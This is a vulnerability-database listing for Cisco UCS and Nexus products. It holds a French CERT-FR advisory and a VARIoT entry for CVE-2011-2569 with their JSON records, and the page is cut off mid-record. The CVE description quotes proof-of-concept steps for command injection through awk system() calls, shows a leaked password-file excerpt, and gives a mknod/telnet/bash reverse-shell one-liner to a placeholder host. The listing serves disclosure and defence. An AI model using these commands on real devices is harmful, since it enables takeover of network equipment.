Search criteria
3 vulnerabilities found for ucs by cisco
CERTFR-2025-AVI-0737
Vulnerability from certfr_avis - Published: - Updated:
De multiples vulnérabilités ont été découvertes dans les produits Cisco. Elles permettent à un attaquant de provoquer un déni de service à distance et un contournement de la politique de sécurité.
Solutions
Se référer au bulletin de sécurité de l'éditeur pour l'obtention des correctifs (cf. section Documentation).
Impacted products
| Vendor | Product | Description | ||
|---|---|---|---|---|
| Cisco | NFVIS | NFVIS versions antérieures à 4.18.1 | ||
| Cisco | UCS | UCS Server versions antérieures à 4.15.2 sur UCS séries E | ||
| Cisco | UCS | UCS Server versions 4.3 antérieures à 4.3(5.250001) sur UCS séries C | ||
| Cisco | UCS | UCS Server versions antérieures à 4.2(3o) sur UCS séries B, C et X | ||
| Cisco | Intersight Server | Intersight Server versions 5.0 antérieures à 5.0(4i) sur UCS séries X | ||
| Cisco | Intersight Server | Intersight Server versions 5.x antérieures à 5.3(0.250001) sur UCS séries B et X | ||
| Cisco | Intersight Server | Intersight Server versions antérieures à 4.2(3l) sur UCS séries B | ||
| Cisco | UCS | UCS Server versions 4.3 antérieures à 4.3(5c) sur UCS séries B, C et X | ||
| Cisco | UCS | UCS Manager versions 4.3 antérieures à 4.3(6a) | ||
| Cisco | UCS | UCS Manager Software versions antérieures à 4.2(3p) | ||
| Cisco | commutateurs Nexus | les commutateurs Nexus séries 3000 et 9000, se référer au bulletin de sécurité de l'éditeur pour les systèmes affectés (cf. section Documentation) |
References
| Title | Publication Time | Tags | ||||||
|---|---|---|---|---|---|---|---|---|
|
||||||||
{
"$ref": "https://www.cert.ssi.gouv.fr/openapi.json",
"affected_systems": [
{
"description": "NFVIS versions ant\u00e9rieures \u00e0 4.18.1",
"product": {
"name": "NFVIS",
"vendor": {
"name": "Cisco",
"scada": false
}
}
},
{
"description": "UCS Server versions ant\u00e9rieures \u00e0 4.15.2 sur UCS s\u00e9ries E",
"product": {
"name": "UCS",
"vendor": {
"name": "Cisco",
"scada": false
}
}
},
{
"description": "UCS Server versions 4.3 ant\u00e9rieures \u00e0 4.3(5.250001) sur UCS s\u00e9ries C",
"product": {
"name": "UCS",
"vendor": {
"name": "Cisco",
"scada": false
}
}
},
{
"description": "UCS Server versions ant\u00e9rieures \u00e0 4.2(3o) sur UCS s\u00e9ries B, C et X",
"product": {
"name": "UCS",
"vendor": {
"name": "Cisco",
"scada": false
}
}
},
{
"description": "Intersight Server versions 5.0 ant\u00e9rieures \u00e0 5.0(4i) sur UCS s\u00e9ries X",
"product": {
"name": "Intersight Server",
"vendor": {
"name": "Cisco",
"scada": false
}
}
},
{
"description": "Intersight Server versions 5.x ant\u00e9rieures \u00e0 5.3(0.250001) sur UCS s\u00e9ries B et X",
"product": {
"name": "Intersight Server",
"vendor": {
"name": "Cisco",
"scada": false
}
}
},
{
"description": "Intersight Server versions ant\u00e9rieures \u00e0 4.2(3l) sur UCS s\u00e9ries B",
"product": {
"name": "Intersight Server",
"vendor": {
"name": "Cisco",
"scada": false
}
}
},
{
"description": "UCS Server versions 4.3 ant\u00e9rieures \u00e0 4.3(5c) sur UCS s\u00e9ries B, C et X",
"product": {
"name": "UCS",
"vendor": {
"name": "Cisco",
"scada": false
}
}
},
{
"description": "UCS Manager versions 4.3 ant\u00e9rieures \u00e0 4.3(6a)",
"product": {
"name": "UCS",
"vendor": {
"name": "Cisco",
"scada": false
}
}
},
{
"description": "UCS Manager Software versions ant\u00e9rieures \u00e0 4.2(3p)",
"product": {
"name": "UCS",
"vendor": {
"name": "Cisco",
"scada": false
}
}
},
{
"description": "les commutateurs Nexus s\u00e9ries 3000 et 9000, se r\u00e9f\u00e9rer au bulletin de s\u00e9curit\u00e9 de l\u0027\u00e9diteur pour les syst\u00e8mes affect\u00e9s (cf. section Documentation)",
"product": {
"name": "commutateurs Nexus",
"vendor": {
"name": "Cisco",
"scada": false
}
}
}
],
"affected_systems_content": "",
"content": "## Solutions\n\nSe r\u00e9f\u00e9rer au bulletin de s\u00e9curit\u00e9 de l\u0027\u00e9diteur pour l\u0027obtention des correctifs (cf. section Documentation).",
"cves": [
{
"name": "CVE-2025-20317",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-20317"
},
{
"name": "CVE-2025-20241",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-20241"
}
],
"links": [],
"reference": "CERTFR-2025-AVI-0737",
"revisions": [
{
"description": "Version initiale",
"revision_date": "2025-08-28T00:00:00.000000"
}
],
"risks": [
{
"description": "D\u00e9ni de service \u00e0 distance"
},
{
"description": "Contournement de la politique de s\u00e9curit\u00e9"
}
],
"summary": "De multiples vuln\u00e9rabilit\u00e9s ont \u00e9t\u00e9 d\u00e9couvertes dans les produits Cisco. Elles permettent \u00e0 un attaquant de provoquer un d\u00e9ni de service \u00e0 distance et un contournement de la politique de s\u00e9curit\u00e9.",
"title": "Multiples vuln\u00e9rabilit\u00e9s dans les produits Cisco",
"vendor_advisories": [
{
"published_at": "2025-08-27",
"title": "Bulletin de s\u00e9curit\u00e9 Cisco cisco-sa-ucs-vkvmorv-CnKrV7HK",
"url": "https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-ucs-vkvmorv-CnKrV7HK"
},
{
"published_at": "2025-08-27",
"title": "Bulletin de s\u00e9curit\u00e9 Cisco cisco-sa-n39k-isis-dos-JhJA8Rfx",
"url": "https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-n39k-isis-dos-JhJA8Rfx"
}
]
}
VAR-201110-0195
Vulnerability from variot - Updated: 2023-12-18 13:57Cisco Nexus OS (aka NX-OS) 4.2 and 5.0 and Cisco Unified Computing System with software 1.4 and 2.0 do not properly restrict command-line options, which allows local users to gain privileges via unspecified vectors, aka Bug IDs CSCtf40008, CSCtg18363, CSCtr44645, CSCts10195, and CSCts10188. The problem is Bug ID CSCtf40008 , CSCtg18363 , CSCtr44645 , CSCts10195 ,and CSCts10188 It is a problem.Authority may be obtained by local users. The Cisco Nexus Series switches are data center switches. Adopt the Cisco Nexus OS operating system. The section command is used as an AWK script to pass the request string, but the input is not fully filtered. Any command can be executed on the LINUX subsystem. nx1# sh clock | sed 's/./BEGIN \{ system\(\\"id \"\) \}/' > 20110713.awk Warning: There is already a file existing with this name. Do you want to overwrite (yes/no)? [no] y nx1# sh clock | sec ' -f /bootflash /20110713.awk ' uid=2003(user) gid=504(network-operator) 11:16:04.082 UTC Wed Jul 13 2011 nx1# sh clock | sed 's/./BEGIN \{ system\(\\"ls \/mnt\/cfg\/0\/\"\) \}/' > 20110713.awk nx1# sh clock | sec ' -f /bootflash/20110713.awk ' ascii bin boot cfglabel.sysmgr debug licenses linux log lost +found 11:18:41.885 UTC Wed Jul 13 2011 can be used to delete any file in the boot flash or send the 'reboot' command. In addition, the less command Han total, press the colon and press the \"e\" key to specify the file path to be opened. You can view any system file: bin::1:1:bin:/bin: daemon::2:2:daemon :/usr/sbin: sys::3:3:sys:/dev: ftp::15:14:ftp:/var/ftp:/isanboot/bin/nobash ftpuser:UvdRSOzORvz9o:99:14:ftpuser: /var/ftp:/isanboot/bin/nobash nobody:*:65534:65534:nobody:/home:/bin/sh admin:x:2002:503::/var/home/admin:/isan/bin/vsh_perm Use \"|\" (pipe) and then press the \"$\" macro key to execute the command: !ls -lah > /bootflash/20110715 You can also create a remote shell by doing the following: mknod rs p; telnet ad.dr.es. s 8888 0rs. A local attacker can exploit these issues to execute arbitrary commands with administrative privileges. Successful exploits may compromise the affected computer. Cisco MDS, UCS, Nexus 7000, 5000, 4000, 3000, 2000, and 1000V are vulnerable; other versions may also be affected
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201110-0195",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "unified computing system 1.4",
"scope": null,
"trust": 2.4,
"vendor": "cisco",
"version": null
},
{
"model": "nx-os",
"scope": "eq",
"trust": 1.9,
"vendor": "cisco",
"version": "5.0"
},
{
"model": "nx-os",
"scope": "eq",
"trust": 1.6,
"vendor": "cisco",
"version": "4.2"
},
{
"model": "unified computing system",
"scope": "eq",
"trust": 1.6,
"vendor": "cisco",
"version": null
},
{
"model": "unified computing system infrastructure and unified computing system software",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "2.0\\(1q\\)"
},
{
"model": "unified computing system infrastructure and unified computing system software",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "1.4\\(1j\\)"
},
{
"model": "nx-os",
"scope": "eq",
"trust": 0.8,
"vendor": "cisco",
"version": "4.2 and 5.0"
},
{
"model": "unified computing system",
"scope": "eq",
"trust": 0.8,
"vendor": "cisco",
"version": "with software 1.4 and 2.0"
},
{
"model": "ucs",
"scope": null,
"trust": 0.6,
"vendor": "cisco",
"version": null
},
{
"model": "mds",
"scope": null,
"trust": 0.6,
"vendor": "cisco",
"version": null
},
{
"model": "nexus",
"scope": "eq",
"trust": 0.6,
"vendor": "cisco",
"version": "1000v"
},
{
"model": "nexus",
"scope": "eq",
"trust": 0.6,
"vendor": "cisco",
"version": "2000"
},
{
"model": "nexus",
"scope": "eq",
"trust": 0.6,
"vendor": "cisco",
"version": "3000"
},
{
"model": "nexus",
"scope": "eq",
"trust": 0.6,
"vendor": "cisco",
"version": "4000"
},
{
"model": "nexus",
"scope": "eq",
"trust": 0.6,
"vendor": "cisco",
"version": "5000"
},
{
"model": "nexus",
"scope": "eq",
"trust": 0.6,
"vendor": "cisco",
"version": "7000"
},
{
"model": "unified computing system",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "2.0"
},
{
"model": "unified computing system",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "0"
},
{
"model": "nx-os 5.0 u1",
"scope": null,
"trust": 0.3,
"vendor": "cisco",
"version": null
},
{
"model": "nx-os 5.0 n2",
"scope": null,
"trust": 0.3,
"vendor": "cisco",
"version": null
},
{
"model": "nx-os",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "5.0(3)"
},
{
"model": "nx-os",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "5.0(2)"
},
{
"model": "nx-os",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "5.0(0.54)"
},
{
"model": "nx-os",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "4.2.1"
},
{
"model": "nx-os",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "4.2(5)"
},
{
"model": "nx-os",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "4.2(4)"
},
{
"model": "nx-os",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "4.2(3)"
},
{
"model": "nx-os",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "4.2(2)"
},
{
"model": "nx-os",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "4.1(4)"
},
{
"model": "nx-os 4.1 n2",
"scope": null,
"trust": 0.3,
"vendor": "cisco",
"version": null
},
{
"model": "nx-os 4.0 n2",
"scope": null,
"trust": 0.3,
"vendor": "cisco",
"version": null
},
{
"model": "nx-os",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "0"
},
{
"model": "nexus",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "70000"
},
{
"model": "nexus",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "50000"
},
{
"model": "nexus",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "40000"
},
{
"model": "nexus",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "30000"
},
{
"model": "nexus",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "20000"
},
{
"model": "nexus",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "1000v0"
},
{
"model": "mds",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "9000"
},
{
"model": "mds",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "0"
},
{
"model": "unified computing system 2.0",
"scope": "ne",
"trust": 0.3,
"vendor": "cisco",
"version": null
},
{
"model": "nx-os",
"scope": "ne",
"trust": 0.3,
"vendor": "cisco",
"version": "5.2(1)"
},
{
"model": "nx-os 5.1 n1",
"scope": "ne",
"trust": 0.3,
"vendor": "cisco",
"version": null
},
{
"model": "nx-os",
"scope": "ne",
"trust": 0.3,
"vendor": "cisco",
"version": "5.1(1)"
},
{
"model": "nx-os 5.0 u2",
"scope": "ne",
"trust": 0.3,
"vendor": "cisco",
"version": null
},
{
"model": "nx-os",
"scope": "ne",
"trust": 0.3,
"vendor": "cisco",
"version": "4.2(6)"
},
{
"model": "nx-os 4.2 sv1",
"scope": "ne",
"trust": 0.3,
"vendor": "cisco",
"version": null
},
{
"model": "nx-os 4.2 n2",
"scope": "ne",
"trust": 0.3,
"vendor": "cisco",
"version": null
},
{
"model": "nx-os 4.1 n2",
"scope": "ne",
"trust": 0.3,
"vendor": "cisco",
"version": null
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2011-4420"
},
{
"db": "BID",
"id": "50347"
},
{
"db": "JVNDB",
"id": "JVNDB-2011-002700"
},
{
"db": "NVD",
"id": "CVE-2011-2569"
},
{
"db": "CNNVD",
"id": "CNNVD-201110-586"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:cisco:nx-os:4.2:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:o:cisco:nx-os:5.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:cisco:unified_computing_system:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:cisco:unified_computing_system_infrastructure_and_unified_computing_system_software:2.0\\(1q\\):*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:o:cisco:unified_computing_system_infrastructure_and_unified_computing_system_software:1.4\\(1j\\):*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2011-2569"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Peter Adkins",
"sources": [
{
"db": "BID",
"id": "50347"
},
{
"db": "CNNVD",
"id": "CNNVD-201110-586"
}
],
"trust": 0.9
},
"cve": "CVE-2011-2569",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "LOCAL",
"authentication": "SINGLE",
"author": "NVD",
"availabilityImpact": "COMPLETE",
"baseScore": 6.8,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 3.1,
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "MEDIUM",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:L/AC:L/Au:S/C:C/I:C/A:C",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Local",
"authentication": "Single",
"author": "NVD",
"availabilityImpact": "Complete",
"baseScore": 6.8,
"confidentialityImpact": "Complete",
"exploitabilityScore": null,
"id": "CVE-2011-2569",
"impactScore": null,
"integrityImpact": "Complete",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Medium",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:L/AC:L/Au:S/C:C/I:C/A:C",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "LOCAL",
"authentication": "SINGLE",
"author": "VULHUB",
"availabilityImpact": "COMPLETE",
"baseScore": 6.8,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 3.1,
"id": "VHN-50514",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "MEDIUM",
"trust": 0.1,
"vectorString": "AV:L/AC:L/AU:S/C:C/I:C/A:C",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "NVD",
"id": "CVE-2011-2569",
"trust": 1.8,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-201110-586",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "VULHUB",
"id": "VHN-50514",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-50514"
},
{
"db": "JVNDB",
"id": "JVNDB-2011-002700"
},
{
"db": "NVD",
"id": "CVE-2011-2569"
},
{
"db": "CNNVD",
"id": "CNNVD-201110-586"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Cisco Nexus OS (aka NX-OS) 4.2 and 5.0 and Cisco Unified Computing System with software 1.4 and 2.0 do not properly restrict command-line options, which allows local users to gain privileges via unspecified vectors, aka Bug IDs CSCtf40008, CSCtg18363, CSCtr44645, CSCts10195, and CSCts10188. The problem is Bug ID CSCtf40008 , CSCtg18363 , CSCtr44645 , CSCts10195 ,and CSCts10188 It is a problem.Authority may be obtained by local users. The Cisco Nexus Series switches are data center switches. Adopt the Cisco Nexus OS operating system. The section command is used as an AWK script to pass the request string, but the input is not fully filtered. Any command can be executed on the LINUX subsystem. nx1# sh clock | sed \u0027s/.*/BEGIN \\\\{ system\\\\(\\\\\\\"id \\\"\\\\) \\\\}/\u0027 \u003e 20110713.awk Warning: There is already a file existing with this name. Do you want to overwrite (yes/no)? [no] y nx1# sh clock | sec \u0027* -f /bootflash /20110713.awk \u0027 uid=2003(user) gid=504(network-operator) 11:16:04.082 UTC Wed Jul 13 2011 nx1# sh clock | sed \u0027s/.*/BEGIN \\\\{ system\\\\(\\\\\\\"ls \\\\/mnt\\\\/cfg\\\\/0\\\\/\\\"\\\\) \\\\}/\u0027 \u003e 20110713.awk nx1# sh clock | sec \u0027* -f /bootflash/20110713.awk \u0027 ascii bin boot cfglabel.sysmgr debug licenses linux log lost +found 11:18:41.885 UTC Wed Jul 13 2011 can be used to delete any file in the boot flash or send the \u0027reboot\u0027 command. In addition, the less command Han total, press the colon and press the \\\"e\\\" key to specify the file path to be opened. You can view any system file: bin:*:1:1:bin:/bin: daemon:*:2:2:daemon :/usr/sbin: sys:*:3:3:sys:/dev: ftp:*:15:14:ftp:/var/ftp:/isanboot/bin/nobash ftpuser:UvdRSOzORvz9o:99:14:ftpuser: /var/ftp:/isanboot/bin/nobash nobody:*:65534:65534:nobody:/home:/bin/sh admin:x:2002:503::/var/home/admin:/isan/bin/vsh_perm Use \\\"|\\\" (pipe) and then press the \\\"$\\\" macro key to execute the command: !ls -lah \u003e /bootflash/20110715 You can also create a remote shell by doing the following: mknod rs p; telnet ad.dr.es. s 8888 0\u003crs | /bin/bash 1\u003ers. \nA local attacker can exploit these issues to execute arbitrary commands with administrative privileges. Successful exploits may compromise the affected computer. \nCisco MDS, UCS, Nexus 7000, 5000, 4000, 3000, 2000, and 1000V are vulnerable; other versions may also be affected",
"sources": [
{
"db": "NVD",
"id": "CVE-2011-2569"
},
{
"db": "JVNDB",
"id": "JVNDB-2011-002700"
},
{
"db": "CNVD",
"id": "CNVD-2011-4420"
},
{
"db": "BID",
"id": "50347"
},
{
"db": "VULHUB",
"id": "VHN-50514"
}
],
"trust": 2.52
},
"exploit_availability": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"reference": "https://www.scap.org.cn/vuln/vhn-50514",
"trust": 0.1,
"type": "unknown"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-50514"
}
]
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2011-2569",
"trust": 3.4
},
{
"db": "JVNDB",
"id": "JVNDB-2011-002700",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201110-586",
"trust": 0.7
},
{
"db": "CNVD",
"id": "CNVD-2011-4420",
"trust": 0.6
},
{
"db": "NSFOCUS",
"id": "18029",
"trust": 0.6
},
{
"db": "BID",
"id": "50347",
"trust": 0.4
},
{
"db": "PACKETSTORM",
"id": "106171",
"trust": 0.1
},
{
"db": "VULHUB",
"id": "VHN-50514",
"trust": 0.1
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2011-4420"
},
{
"db": "VULHUB",
"id": "VHN-50514"
},
{
"db": "BID",
"id": "50347"
},
{
"db": "JVNDB",
"id": "JVNDB-2011-002700"
},
{
"db": "NVD",
"id": "CVE-2011-2569"
},
{
"db": "CNNVD",
"id": "CNNVD-201110-586"
}
]
},
"id": "VAR-201110-0195",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2011-4420"
},
{
"db": "VULHUB",
"id": "VHN-50514"
}
],
"trust": 1.3225354249999999
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2011-4420"
}
]
},
"last_update_date": "2023-12-18T13:57:55.869000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "24458",
"trust": 0.8,
"url": "http://tools.cisco.com/security/center/viewalert.x?alertid=24458"
},
{
"title": "Cisco Nexus OS \u0027section\u0027 and \u0027less\u0027 local command injection vulnerability patches",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchinfo/show/5588"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2011-4420"
},
{
"db": "JVNDB",
"id": "JVNDB-2011-002700"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-264",
"trust": 1.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-50514"
},
{
"db": "JVNDB",
"id": "JVNDB-2011-002700"
},
{
"db": "NVD",
"id": "CVE-2011-2569"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.0,
"url": "http://tools.cisco.com/security/center/viewalert.x?alertid=24458"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2011-2569"
},
{
"trust": 0.8,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2011-2569"
},
{
"trust": 0.6,
"url": "http://www.securityfocus.com/archive/1/520193"
},
{
"trust": 0.6,
"url": "http://www.nsfocus.net/vulndb/18029"
},
{
"trust": 0.3,
"url": "/archive/1/520193"
},
{
"trust": 0.3,
"url": "/archive/1/520290"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2011-4420"
},
{
"db": "VULHUB",
"id": "VHN-50514"
},
{
"db": "BID",
"id": "50347"
},
{
"db": "JVNDB",
"id": "JVNDB-2011-002700"
},
{
"db": "NVD",
"id": "CVE-2011-2569"
},
{
"db": "CNNVD",
"id": "CNNVD-201110-586"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2011-4420"
},
{
"db": "VULHUB",
"id": "VHN-50514"
},
{
"db": "BID",
"id": "50347"
},
{
"db": "JVNDB",
"id": "JVNDB-2011-002700"
},
{
"db": "NVD",
"id": "CVE-2011-2569"
},
{
"db": "CNNVD",
"id": "CNNVD-201110-586"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2011-10-25T00:00:00",
"db": "CNVD",
"id": "CNVD-2011-4420"
},
{
"date": "2011-10-27T00:00:00",
"db": "VULHUB",
"id": "VHN-50514"
},
{
"date": "2011-10-24T00:00:00",
"db": "BID",
"id": "50347"
},
{
"date": "2011-11-04T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2011-002700"
},
{
"date": "2011-10-27T21:55:00.730000",
"db": "NVD",
"id": "CVE-2011-2569"
},
{
"date": "1900-01-01T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201110-586"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2011-10-25T00:00:00",
"db": "CNVD",
"id": "CNVD-2011-4420"
},
{
"date": "2018-10-30T00:00:00",
"db": "VULHUB",
"id": "VHN-50514"
},
{
"date": "2015-03-19T08:37:00",
"db": "BID",
"id": "50347"
},
{
"date": "2011-11-04T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2011-002700"
},
{
"date": "2018-10-30T16:26:47.373000",
"db": "NVD",
"id": "CVE-2011-2569"
},
{
"date": "2011-11-07T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201110-586"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "local",
"sources": [
{
"db": "BID",
"id": "50347"
},
{
"db": "CNNVD",
"id": "CNNVD-201110-586"
}
],
"trust": 0.9
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
